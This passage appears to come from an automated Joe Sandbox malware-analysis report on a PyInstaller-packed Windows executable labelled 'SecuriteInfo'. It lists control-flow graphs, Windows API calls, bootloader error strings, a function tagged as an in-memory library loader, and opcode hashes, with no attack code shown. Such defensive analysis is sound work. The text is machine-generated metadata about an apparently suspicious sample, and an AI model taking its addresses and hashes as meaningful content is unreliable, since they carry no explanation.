7ff7b2b6390e-7ff7b2b63916 call 7ff7b2b74f30 68->70 70->75 79 7ff7b2b63a44-7ff7b2b63a47 75->79 80 7ff7b2b63b45-7ff7b2b63b53 75->80 79->80 83 7ff7b2b63a4d-7ff7b2b63a50 79->83 81 7ff7b2b63a67 80->81 82 7ff7b2b63b59-7ff7b2b63b5d 80->82 84 7ff7b2b63a6b-7ff7b2b63a90 call 7ff7b2b74f30 81->84 82->84 85 7ff7b2b63b14-7ff7b2b63b17 83->85 86 7ff7b2b63a56-7ff7b2b63a5a 83->86 95 7ff7b2b63aab-7ff7b2b63ac0 84->95 96 7ff7b2b63a92-7ff7b2b63aa6 call 7ff7b2b68940 84->96 88 7ff7b2b63b19-7ff7b2b63b1d 85->88 89 7ff7b2b63b2f-7ff7b2b63b40 call 7ff7b2b62710 85->89 86->85 87 7ff7b2b63a60 86->87 87->81 88->89 91 7ff7b2b63b1f-7ff7b2b63b2a 88->91 99 7ff7b2b63c7f-7ff7b2b63c87 89->99 91->84 97 7ff7b2b63be8-7ff7b2b63bfa call 7ff7b2b68830 95->97 98 7ff7b2b63ac6-7ff7b2b63aca 95->98 96->95 107 7ff7b2b63bfc-7ff7b2b63c02 97->107 108 7ff7b2b63c2e 97->108 102 7ff7b2b63bcd-7ff7b2b63be2 call 7ff7b2b61940 98->102 103 7ff7b2b63ad0-7ff7b2b63ae8 call 7ff7b2b75250 98->103 99->42 102->97 102->98 111 7ff7b2b63aea-7ff7b2b63b02 call 7ff7b2b75250 103->111 112 7ff7b2b63b62-7ff7b2b63b7a call 7ff7b2b75250 103->112 113 7ff7b2b63c1e-7ff7b2b63c2c 107->113 114 7ff7b2b63c04-7ff7b2b63c1c 107->114 115 7ff7b2b63c31-7ff7b2b63c40 call 7ff7b2b74f30 108->115 111->102 124 7ff7b2b63b08-7ff7b2b63b0f 111->124 122 7ff7b2b63b7c-7ff7b2b63b80 112->122 123 7ff7b2b63b87-7ff7b2b63b9f call 7ff7b2b75250 112->123 113->115 114->115 125 7ff7b2b63c46-7ff7b2b63c4a 115->125 126 7ff7b2b63d41-7ff7b2b63d63 call 7ff7b2b644e0 115->126 122->123 135 7ff7b2b63bac-7ff7b2b63bc4 call 7ff7b2b75250 123->135 136 7ff7b2b63ba1-7ff7b2b63ba5 123->136 124->102 128 7ff7b2b63cd4-7ff7b2b63ce6 call 7ff7b2b68830 125->128 129 7ff7b2b63c50-7ff7b2b63c5f call 7ff7b2b690e0 125->129 138 7ff7b2b63d65-7ff7b2b63d6f call 7ff7b2b64630 126->138 139 7ff7b2b63d71-7ff7b2b63d82 call 7ff7b2b61c80 126->139 144 7ff7b2b63ce8-7ff7b2b63ceb 128->144 145 7ff7b2b63d35-7ff7b2b63d3c 128->145 146 7ff7b2b63cb3-7ff7b2b63cbd call 7ff7b2b68660 129->146 147 7ff7b2b63c61 129->147 135->102 159 7ff7b2b63bc6 135->159 136->135 150 7ff7b2b63d87-7ff7b2b63d96 138->150 139->150 144->145 149 7ff7b2b63ced-7ff7b2b63d10 call 7ff7b2b61c80 144->149 153 7ff7b2b63c68 call 7ff7b2b62710 145->153 164 7ff7b2b63cc8-7ff7b2b63ccf 146->164 165 7ff7b2b63cbf-7ff7b2b63cc6 146->165 147->153 166 7ff7b2b63d2b-7ff7b2b63d33 call 7ff7b2b74f30 149->166 167 7ff7b2b63d12-7ff7b2b63d26 call 7ff7b2b62710 call 7ff7b2b74f30 149->167 156 7ff7b2b63d98-7ff7b2b63d9f 150->156 157 7ff7b2b63dc4-7ff7b2b63dda call 7ff7b2b69390 150->157 160 7ff7b2b63c6d-7ff7b2b63c77 153->160 156->157 162 7ff7b2b63da1-7ff7b2b63da5 156->162 172 7ff7b2b63ddc 157->172 173 7ff7b2b63de8-7ff7b2b63e04 SetDllDirectoryW 157->173 159->102 160->99 162->157 168 7ff7b2b63da7-7ff7b2b63dbe SetDllDirectoryW LoadLibraryExW 162->168 164->150 165->153 166->150 167->160 168->157 172->173 176 7ff7b2b63e0a-7ff7b2b63e19 call 7ff7b2b68830 173->176 177 7ff7b2b63f01-7ff7b2b63f08 173->177 187 7ff7b2b63e1b-7ff7b2b63e21 176->187 188 7ff7b2b63e32-7ff7b2b63e3c call 7ff7b2b74f30 176->188 179 7ff7b2b63f0e-7ff7b2b63f15 177->179 180 7ff7b2b64008-7ff7b2b64010 177->180 179->180 184 7ff7b2b63f1b-7ff7b2b63f25 call 7ff7b2b633c0 179->184 185 7ff7b2b64035-7ff7b2b6404a call 7ff7b2b636a0 call 7ff7b2b63360 call 7ff7b2b63670 180->185 186 7ff7b2b64012-7ff7b2b6402f PostMessageW GetMessageW 180->186 184->160 198 7ff7b2b63f2b-7ff7b2b63f3f call 7ff7b2b690c0 184->198 209 7ff7b2b6404f-7ff7b2b64067 call 7ff7b2b66fc0 call 7ff7b2b66d70 185->209 186->185 192 7ff7b2b63e2d-7ff7b2b63e2f 187->192 193 7ff7b2b63e23-7ff7b2b63e2b 187->193 200 7ff7b2b63ef2-7ff7b2b63efc call 7ff7b2b68940 188->200 201 7ff7b2b63e42-7ff7b2b63e48 188->201 192->188 193->192 207 7ff7b2b63f64-7ff7b2b63fa7 call 7ff7b2b68940 call 7ff7b2b689e0 call 7ff7b2b66fc0 call 7ff7b2b66d70 call 7ff7b2b688e0 198->207 208 7ff7b2b63f41-7ff7b2b63f5e PostMessageW GetMessageW 198->208 200->177 201->200 205 7ff7b2b63e4e-7ff7b2b63e54 201->205 210 7ff7b2b63e56-7ff7b2b63e58 205->210 211 7ff7b2b63e5f-7ff7b2b63e61 205->211 248 7ff7b2b63fa9-7ff7b2b63fbf call 7ff7b2b68ed0 call 7ff7b2b688e0 207->248 249 7ff7b2b63ff5-7ff7b2b64003 call 7ff7b2b61900 207->249 208->207 214 7ff7b2b63e67-7ff7b2b63e83 call 7ff7b2b66dc0 call 7ff7b2b67340 210->214 215 7ff7b2b63e5a 210->215 211->177 211->214 227 7ff7b2b63e8e-7ff7b2b63e95 214->227 228 7ff7b2b63e85-7ff7b2b63e8c 214->228 215->177 230 7ff7b2b63e97-7ff7b2b63ea4 call 7ff7b2b66e00 227->230 231 7ff7b2b63eaf-7ff7b2b63eb9 call 7ff7b2b671b0 227->231 232 7ff7b2b63edb-7ff7b2b63ef0 call 7ff7b2b62a50 call 7ff7b2b66fc0 call 7ff7b2b66d70 228->232 230->231 243 7ff7b2b63ea6-7ff7b2b63ead 230->243 245 7ff7b2b63ebb-7ff7b2b63ec2 231->245 246 7ff7b2b63ec4-7ff7b2b63ed2 call 7ff7b2b674f0 231->246 232->177 243->232 245->232 246->177 258 7ff7b2b63ed4 246->258 248->249 261 7ff7b2b63fc1-7ff7b2b63fd6 248->261 249->160 258->232 262 7ff7b2b63fd8-7ff7b2b63feb call 7ff7b2b62710 call 7ff7b2b61900 261->262 263 7ff7b2b63ff0 call 7ff7b2b62a50 261->263 262->160 263->249
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2447695186.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447654985.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447731342.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447768150.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447768150.00007FF7B2BA1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447830524.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: ErrorFileLastModuleName
                                                                                                                                                                                                                                    • String ID: Could not create temporary directory!$Could not load PyInstaller's embedded PKG archive from the executable (%s)$Could not side-load PyInstaller's PKG archive from external file (%s)$Failed to convert DLL search path!$Failed to initialize security descriptor for temporary directory!$Failed to load Tcl/Tk shared libraries for splash screen!$Failed to load splash screen resources!$Failed to remove temporary directory: %s$Failed to start splash screen!$Failed to unpack splash screen dependencies from PKG archive!$Invalid value in _PYI_PARENT_PROCESS_LEVEL: %s$MEI$PYINSTALLER_RESET_ENVIRONMENT$PYINSTALLER_STRICT_UNPACK_MODE$PYINSTALLER_SUPPRESS_SPLASH_SCREEN$Path exceeds PYI_PATH_MAX limit.$Py_GIL_DISABLED$VCRUNTIME140.dll$_PYI_APPLICATION_HOME_DIR$_PYI_APPLICATION_HOME_DIR not set for onefile child process!$_PYI_ARCHIVE_FILE$_PYI_PARENT_PROCESS_LEVEL$_PYI_SPLASH_IPC$pkg$pyi-contents-directory$pyi-disable-windowed-traceback$pyi-python-flag$pyi-runtime-tmpdir
                                                                                                                                                                                                                                    • API String ID: 2776309574-4232158417
                                                                                                                                                                                                                                    • Opcode ID: 22fa9124200c8f056fed24b16db7ecbee18f75092d4bb1744dca779f6c6fa9b9
                                                                                                                                                                                                                                    • Instruction ID: 5369ba84b5ec896d6659514cd31c37792b2bf0098ce807c961b8f287616f1c2d
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 22fa9124200c8f056fed24b16db7ecbee18f75092d4bb1744dca779f6c6fa9b9
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8132B222A0A68250FB1BB72C94543BBE651AF67B40FC44036DB5D862DEFFACE454C325
                                                                                                                                                                                                                                    Function 00007FF7B2B86964 Relevance: 13.8, APIs: 9, Instructions: 276fileCOMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 467 7ff7b2b86964-7ff7b2b869d7 call 7ff7b2b86698 470 7ff7b2b869d9-7ff7b2b869e2 call 7ff7b2b74ee8 467->470 471 7ff7b2b869f1-7ff7b2b869fb call 7ff7b2b78520 467->471 476 7ff7b2b869e5-7ff7b2b869ec call 7ff7b2b74f08 470->476 477 7ff7b2b869fd-7ff7b2b86a14 call 7ff7b2b74ee8 call 7ff7b2b74f08 471->477 478 7ff7b2b86a16-7ff7b2b86a7f CreateFileW 471->478 491 7ff7b2b86d32-7ff7b2b86d52 476->491 477->476 481 7ff7b2b86afc-7ff7b2b86b07 GetFileType 478->481 482 7ff7b2b86a81-7ff7b2b86a87 478->482 486 7ff7b2b86b5a-7ff7b2b86b61 481->486 487 7ff7b2b86b09-7ff7b2b86b44 GetLastError call 7ff7b2b74e7c CloseHandle 481->487 483 7ff7b2b86ac9-7ff7b2b86af7 GetLastError call 7ff7b2b74e7c 482->483 484 7ff7b2b86a89-7ff7b2b86a8d 482->484 483->476 484->483 489 7ff7b2b86a8f-7ff7b2b86ac7 CreateFileW 484->489 494 7ff7b2b86b69-7ff7b2b86b6c 486->494 495 7ff7b2b86b63-7ff7b2b86b67 486->495 487->476 502 7ff7b2b86b4a-7ff7b2b86b55 call 7ff7b2b74f08 487->502 489->481 489->483 499 7ff7b2b86b72-7ff7b2b86bc7 call 7ff7b2b78438 494->499 500 7ff7b2b86b6e 494->500 495->499 505 7ff7b2b86bc9-7ff7b2b86bd5 call 7ff7b2b868a0 499->505 506 7ff7b2b86be6-7ff7b2b86c17 call 7ff7b2b86418 499->506 500->499 502->476 505->506 512 7ff7b2b86bd7 505->512 513 7ff7b2b86c1d-7ff7b2b86c5f 506->513 514 7ff7b2b86c19-7ff7b2b86c1b 506->514 515 7ff7b2b86bd9-7ff7b2b86be1 call 7ff7b2b7aac0 512->515 516 7ff7b2b86c81-7ff7b2b86c8c 513->516 517 7ff7b2b86c61-7ff7b2b86c65 513->517 514->515 515->491 519 7ff7b2b86c92-7ff7b2b86c96 516->519 520 7ff7b2b86d30 516->520 517->516 518 7ff7b2b86c67-7ff7b2b86c7c 517->518 518->516 519->520 522 7ff7b2b86c9c-7ff7b2b86ce1 CloseHandle CreateFileW 519->522 520->491 524 7ff7b2b86d16-7ff7b2b86d2b 522->524 525 7ff7b2b86ce3-7ff7b2b86d11 GetLastError call 7ff7b2b74e7c call 7ff7b2b78660 522->525 524->520 525->524
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2447695186.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447654985.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447731342.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447768150.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447768150.00007FF7B2BA1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447830524.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 1617910340-0
                                                                                                                                                                                                                                    • Opcode ID: baaa1bd2bfcf3e8d87424e6061cd652f961a4b3dae6ad7eaae94581ee29caa63
                                                                                                                                                                                                                                    • Instruction ID: 264b094f57909c2bb1460f428ca1dd434130a52c72b27f80e3a9f5a970c7b9ed
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: baaa1bd2bfcf3e8d87424e6061cd652f961a4b3dae6ad7eaae94581ee29caa63
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 09C1F232B25A4185EB15EF68C0852AE7771F75AB98B410239DB2E9B7E8EF78D051C310
                                                                                                                                                                                                                                    Function 00007FFD94064460 Relevance: 9.6, APIs: 4, Strings: 1, Instructions: 893librarymemoryloaderCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2453865099.00007FFD94064000.00000080.00000001.01000000.00000010.sdmp, Offset: 00007FFD93D10000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450428384.00007FFD93D10000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93D11000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93D1D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93D75000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93D89000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93D9A000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93DA0000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93DAD000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93F5D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93F5F000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93F8A000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93FBB000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93FE1000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD9402F000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD94035000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD94037000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD94053000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD94060000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2453916688.00007FFD94066000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ffd93d10000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: ProtectVirtual$AddressLibraryLoadProc
                                                                                                                                                                                                                                    • String ID: s"5
                                                                                                                                                                                                                                    • API String ID: 3300690313-1492618520
                                                                                                                                                                                                                                    • Opcode ID: 0f3ea391c28ca89a74bd740658b8751246de311d9d9a1ab4a8ab4f2b2ce55410
                                                                                                                                                                                                                                    • Instruction ID: 916426b45afbcbac812e8cbe985fd03a717814b28dcc321026a3bab69e555330
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0f3ea391c28ca89a74bd740658b8751246de311d9d9a1ab4a8ab4f2b2ce55410
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D262672272819286E3398F78E59127D7790F74A395F049632EA9FC37C5EA3CEA44D704
                                                                                                                                                                                                                                    Function 00007FF7B2B69280 Relevance: 3.0, APIs: 2, Instructions: 29COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2447695186.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447654985.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447731342.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447768150.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447768150.00007FF7B2BA1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447830524.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Find$CloseFileFirst
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2295610775-0
                                                                                                                                                                                                                                    • Opcode ID: 3849ca1beccae91a12aeced599bc73bdbec409d6dd090ca7d2ec6d5d284a4285
                                                                                                                                                                                                                                    • Instruction ID: d2110104ec7205ee03b1d9cac80374c48a8c3c1b80b4462dcf66a95718dd1f68
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3849ca1beccae91a12aeced599bc73bdbec409d6dd090ca7d2ec6d5d284a4285
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C9F02D22A1974182F7619B68B489377F350BB55324F840335DBAD456D8EF7CD048C704
                                                                                                                                                                                                                                    Function 00007FF7B2B61950 Relevance: 22.9, APIs: 2, Strings: 11, Instructions: 184COMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 269 7ff7b2b61950-7ff7b2b6198b call 7ff7b2b645c0 272 7ff7b2b61c4e-7ff7b2b61c72 call 7ff7b2b6c550 269->272 273 7ff7b2b61991-7ff7b2b619d1 call 7ff7b2b67f90 269->273 278 7ff7b2b61c3b-7ff7b2b61c3e call 7ff7b2b7004c 273->278 279 7ff7b2b619d7-7ff7b2b619e7 call 7ff7b2b706d4 273->279 283 7ff7b2b61c43-7ff7b2b61c4b 278->283 284 7ff7b2b61a08-7ff7b2b61a24 call 7ff7b2b7039c 279->284 285 7ff7b2b619e9-7ff7b2b61a03 call 7ff7b2b74f08 call 7ff7b2b62910 279->285 283->272 291 7ff7b2b61a26-7ff7b2b61a40 call 7ff7b2b74f08 call 7ff7b2b62910 284->291 292 7ff7b2b61a45-7ff7b2b61a5a call 7ff7b2b74f28 284->292 285->278 291->278 299 7ff7b2b61a5c-7ff7b2b61a76 call 7ff7b2b74f08 call 7ff7b2b62910 292->299 300 7ff7b2b61a7b-7ff7b2b61afc call 7ff7b2b61c80 * 2 call 7ff7b2b706d4 292->300 299->278 311 7ff7b2b61b01-7ff7b2b61b14 call 7ff7b2b74f44 300->311 314 7ff7b2b61b16-7ff7b2b61b30 call 7ff7b2b74f08 call 7ff7b2b62910 311->314 315 7ff7b2b61b35-7ff7b2b61b4e call 7ff7b2b7039c 311->315 314->278 320 7ff7b2b61b50-7ff7b2b61b6a call 7ff7b2b74f08 call 7ff7b2b62910 315->320 321 7ff7b2b61b6f-7ff7b2b61b8b call 7ff7b2b70110 315->321 320->278 329 7ff7b2b61b9e-7ff7b2b61bac 321->329 330 7ff7b2b61b8d-7ff7b2b61b99 call 7ff7b2b62710 321->330 329->278 333 7ff7b2b61bb2-7ff7b2b61bb9 329->333 330->278 334 7ff7b2b61bc1-7ff7b2b61bc7 333->334 336 7ff7b2b61bc9-7ff7b2b61bd6 334->336 337 7ff7b2b61be0-7ff7b2b61bef 334->337 338 7ff7b2b61bf1-7ff7b2b61bfa 336->338 337->337 337->338 339 7ff7b2b61bfc-7ff7b2b61bff 338->339 340 7ff7b2b61c0f 338->340 339->340 341 7ff7b2b61c01-7ff7b2b61c04 339->341 342 7ff7b2b61c11-7ff7b2b61c24 340->342 341->340 343 7ff7b2b61c06-7ff7b2b61c09 341->343 344 7ff7b2b61c2d-7ff7b2b61c39 342->344 345 7ff7b2b61c26 342->345 343->340 346 7ff7b2b61c0b-7ff7b2b61c0d 343->346 344->278 344->334 345->344 346->342
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                      • Part of subcall function 00007FF7B2B67F90: _fread_nolock.LIBCMT ref: 00007FF7B2B6803A
                                                                                                                                                                                                                                    • _fread_nolock.LIBCMT ref: 00007FF7B2B61A1B
                                                                                                                                                                                                                                      • Part of subcall function 00007FF7B2B62910: GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF7B2B61B6A), ref: 00007FF7B2B6295E
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2447695186.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447654985.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447731342.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447768150.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447768150.00007FF7B2BA1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447830524.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: _fread_nolock$CurrentProcess
                                                                                                                                                                                                                                    • String ID: Could not allocate buffer for TOC!$Could not allocate memory for archive structure!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$calloc$fread$fseek$malloc
                                                                                                                                                                                                                                    • API String ID: 2397952137-3497178890
                                                                                                                                                                                                                                    • Opcode ID: 27547418d9ab5e62463e202343d91a8db4d430f9fb0a7f3bbb020ab973e08554
                                                                                                                                                                                                                                    • Instruction ID: 3ebe62b530dbe395818ae56b507cd4531cc80e8cb1b47b6e0aadcfa77e58790f
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 27547418d9ab5e62463e202343d91a8db4d430f9fb0a7f3bbb020ab973e08554
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8481C131A1A68285EB13AB2C90442AAF3A1EB66740F844435DB4D8B79DFEBCE045C724
                                                                                                                                                                                                                                    Function 00007FF7B2B61470 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 107COMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2447695186.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447654985.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447731342.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447768150.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447768150.00007FF7B2BA1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447830524.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: CurrentProcess
                                                                                                                                                                                                                                    • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                                                                                                                                    • API String ID: 2050909247-3659356012
                                                                                                                                                                                                                                    • Opcode ID: 8f5680adc7c7fda8f27f7e66f126237117e35862a43ae9ad61e430f2822435f3
                                                                                                                                                                                                                                    • Instruction ID: 545ad54409c11d86934cdfeac539d5fe36c7bb2226d6b1f0a2750ebc3f9fd2a9
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8f5680adc7c7fda8f27f7e66f126237117e35862a43ae9ad61e430f2822435f3
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F2416121A1A54285EA13FB2994005BBF390AF66794FC44436EF4D87B9EEEBCE501C724
                                                                                                                                                                                                                                    Function 00007FF7B2B61210 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 158COMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
